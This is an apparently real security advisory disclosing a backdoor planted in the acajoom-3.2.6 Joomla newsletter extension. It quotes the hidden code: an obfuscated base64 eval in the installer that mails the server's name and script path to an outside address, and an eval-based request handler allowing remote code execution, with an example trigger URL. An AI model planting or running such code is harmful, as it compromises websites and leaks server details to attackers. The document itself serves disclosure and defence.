SecurityvulnsSECURITYVULNS:DOC:22071Back door trojan in acajoom-3.2.6 for joomla
Vulnerability:
Remote code execution back door
Software:
acajoom - mailing list extension for Joomla
Acajoom is a newsletter component designed with ease of use and robustness
in mind. Acajoom can handle an unlimited number of newsletters with an
unlimited number of subscribers in just few clicks. Acajoom reuses some of
Joomla 1.5 new concepts to make the users experience as smooth as possible.
> And that's not all
Severity:
Not a big deal. Joomla components contain all sorts of obfuscated junk all
the time. Who cares what it does?
URLs:
http://www.ijoobi.com/
http://www.ijoobi.com/media/acajoom-3.2.6.zip
Vendor notified:
Naah. No contact details. I suppose I might try battle the captcha one
day.
Vulnerability:
http://www.ijoobi.com/media/acajoom-3.2.6.zip
install.acajoom.php:
function GetBots($us1,$us2,$us3) {
list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
eval(base64_decode($data2.$data1.$data3)); }
define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.'
.$array_lang[10-$count_num] );
$counter = COUNT_ROOT;
$count_db = 'qadr'; $count_num = 8;
GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);
Or, less cryptically:
@mail('[email protected]', $_SERVER['SERVER_NAME'],
"http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']);
self.acajoom.php says:
class acajoomCommonStr
{
function GetStr($str)
{
eval(stripslashes($str));
}
function InController($cnt,$location)
{
if ($location=='en-g') $this->GetStr($cnt);
}
}
if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
$getacajoomStr = new acajoomCommonStr();
$getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
}
ie.
$URL/self.acajoom.php?s=phpinfo();&lang=en-g
$URL is left as an exercise to the reader.
Greetz:
[email protected]